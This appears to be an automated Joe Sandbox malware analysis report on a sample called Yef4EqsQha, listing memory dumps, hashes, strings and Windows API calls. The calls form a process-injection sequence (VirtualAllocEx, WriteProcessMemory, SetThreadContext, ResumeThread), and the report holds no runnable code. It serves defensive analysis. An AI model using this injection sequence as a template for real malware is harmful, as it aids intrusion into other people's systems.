                                                                                                              • Instruction Fuzzy Hash: D743D974A00219CFDB24DF68C888A9DB7B2BF88311F558599D859AB361CB31EDC2CF54
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (oq$(oq$,q$,q$Hq
                                                                                                              • API String ID: 0-962059274
                                                                                                              • Opcode ID: b2ba363a27f78e573eea5ae5695ddfbd102e5000ed18221a0ee20923d3f7f3d9
                                                                                                              • Instruction ID: 668e5ed0258edd00cf01e217c56005d0465c8ffc0f639ddd89f65aa9d13f5dec
                                                                                                              • Opcode Fuzzy Hash: b2ba363a27f78e573eea5ae5695ddfbd102e5000ed18221a0ee20923d3f7f3d9
                                                                                                              • Instruction Fuzzy Hash: C0529035A00255DFDF18DF79C888AADB7B2BF85391B158159EC069B360CB31ED82CB94

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D5FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0112D63B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D678
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0112D6D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D5FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0112D63B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D678
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0112D6D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8q$8q$8q
                                                                                                              • API String ID: 0-3169173723

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$$q$$q
                                                                                                              • API String ID: 0-3275118826

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                              • API String ID: 0-2017700313

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                              • API String ID: 0-2017700313

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077F5E06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077F5E06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0112B566
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011259C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 011259C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077F59D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F582E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077F59D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077F5AB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077F582E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077F5AB8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0112D84F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0112D84F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077F58F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077F58F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077F8B8D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 077F8B8D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0112B566
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Teq
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: 57232479d0ba9721e67ce76fd6ff508687c8e995458cf8c04aa48bce839043cf
                                                                                                              • Instruction ID: bb286de36e532d256f87d6c4ee2b3d3f83fe23fd9cb8c6725b047ea74de5cca7
                                                                                                              • Opcode Fuzzy Hash: 57232479d0ba9721e67ce76fd6ff508687c8e995458cf8c04aa48bce839043cf
                                                                                                              • Instruction Fuzzy Hash: 0111A2B192C244DFD33196E095152F67BAE9B5310AF148CABD446CB196C63E8C43C7F2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q
                                                                                                              • API String ID: 0-1301096350
                                                                                                              • Opcode ID: 454ddd030293eff9733ce1e342222e4dcb0b4338b2511586a2aba3594916d329
                                                                                                              • Instruction ID: d9f06ae98c2146ead6916002daa5a7e59c753558b6cd097db80d8c743f63007e
                                                                                                              • Opcode Fuzzy Hash: 454ddd030293eff9733ce1e342222e4dcb0b4338b2511586a2aba3594916d329
                                                                                                              • Instruction Fuzzy Hash: 45F031F0629642CBD7388A50E9012F1B76DF702285F449BA7D40ACB642C7368C46C7F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: G
                                                                                                              • API String ID: 0-985283518
                                                                                                              • Opcode ID: 259cc151cc1f3a7122ddfd94c9d58e428c67b46e7c00d9a77d99c14be024ec30
                                                                                                              • Instruction ID: ba387e6908a94be7c493c8920109af6ebf55e71d5a4e0124227cb0b4565e66f1
                                                                                                              • Opcode Fuzzy Hash: 259cc151cc1f3a7122ddfd94c9d58e428c67b46e7c00d9a77d99c14be024ec30
                                                                                                              • Instruction Fuzzy Hash: 68D017B112D2889BC3118F94AD021F8BB78D703265F8604D7E819865428A2A0E15A6E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: G
                                                                                                              • API String ID: 0-985283518
                                                                                                              • Opcode ID: b7825b90f70aff88225033284c47f13122e1da4c242722230d5950cd69895fb0
                                                                                                              • Instruction ID: cd0586a17bee380d681b6a5976abac2eb4ed28cceb4c21c7104ecf327ec95383
                                                                                                              • Opcode Fuzzy Hash: b7825b90f70aff88225033284c47f13122e1da4c242722230d5950cd69895fb0
                                                                                                              • Instruction Fuzzy Hash: 89C012F041910CEBC614CF88E9066ACBBAC9742200F41048AE80E42200CF391E20AAA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7c476bbb274ebaec981856f1aae3171cdd1b5debb423ecaa87be99a49aedc4b8
                                                                                                              • Instruction ID: 7732789147c9a8bf314ba582a7a9828722244cc70ee02694f09e22742146542a
                                                                                                              • Opcode Fuzzy Hash: 7c476bbb274ebaec981856f1aae3171cdd1b5debb423ecaa87be99a49aedc4b8
                                                                                                              • Instruction Fuzzy Hash: BEF1C875D1061ACBCF14DFA8C854AEEB7B5FF49300F1086AAD449B7254EB70AA85CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 351c20b70aa05ad869433629e660869a9b791225de6373ed2fae04a462350467
                                                                                                              • Instruction ID: 8c21fa83dbd8fe9e5e3fcf49500a9d31ed265cf706d569eb4cc9b0167b0913cc
                                                                                                              • Opcode Fuzzy Hash: 351c20b70aa05ad869433629e660869a9b791225de6373ed2fae04a462350467
                                                                                                              • Instruction Fuzzy Hash: C0E1C975D1061A8FCF14DFA8C8546EEB7B5FF49300F1086AAD44AB7254EB70AA85CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cabb8dd6a8719d4944b1ed927626fa7375478572c249331208099f378dffc1e
                                                                                                              • Instruction ID: d60f7f96edc11b7651248ecb6738cd24358813c5d7f2375d2d9452493a9c512e
                                                                                                              • Opcode Fuzzy Hash: 1cabb8dd6a8719d4944b1ed927626fa7375478572c249331208099f378dffc1e
                                                                                                              • Instruction Fuzzy Hash: A3B1E471910619CFCB10EF68C840AD9FBB1FF49314F05C699E949BB211EB30AA89CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 86a9373fe307f6f1cfef8f6b2b96e75c9d84a907e73198b345bf287b89e8d373
                                                                                                              • Instruction ID: 125cc6d6f6ea684226efb81659c0daae0991594362c2dc7f1ee95ed94e6c31d8
                                                                                                              • Opcode Fuzzy Hash: 86a9373fe307f6f1cfef8f6b2b96e75c9d84a907e73198b345bf287b89e8d373
                                                                                                              • Instruction Fuzzy Hash: 1D515BB1E01209DFCB25DF69D4986DEBBF2EF89214F15806AE405AB361DB35CC46CB24
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e20d49d33d315944ca5b09f0f7ac089f4f251050a950687edc7b1f1c863f71ce
                                                                                                              • Instruction ID: 752607f6255d1485d976cdc2356acc50e2d3b6df22115daf29db38f9e29fa5e9
                                                                                                              • Opcode Fuzzy Hash: e20d49d33d315944ca5b09f0f7ac089f4f251050a950687edc7b1f1c863f71ce
                                                                                                              • Instruction Fuzzy Hash: 0951FC74A106098FCB14DFA8C8949EEF7B5FF89311B50866AD416B7354EB30ED85CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 860b21bd7a7cb36e945b2a469eb806a2a5d91489ca571c4a389db7a88ce64d8d
                                                                                                              • Instruction ID: 8c52e05746ab4e9f5d713ab1eb348e2ec7116240440c6c545f5235fbf9fcf2a7
                                                                                                              • Opcode Fuzzy Hash: 860b21bd7a7cb36e945b2a469eb806a2a5d91489ca571c4a389db7a88ce64d8d
                                                                                                              • Instruction Fuzzy Hash: FA4160B0A1120ADBDB28DF64E465AEEBBB6BF89201F14446AE406D7350DE34DD41CB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
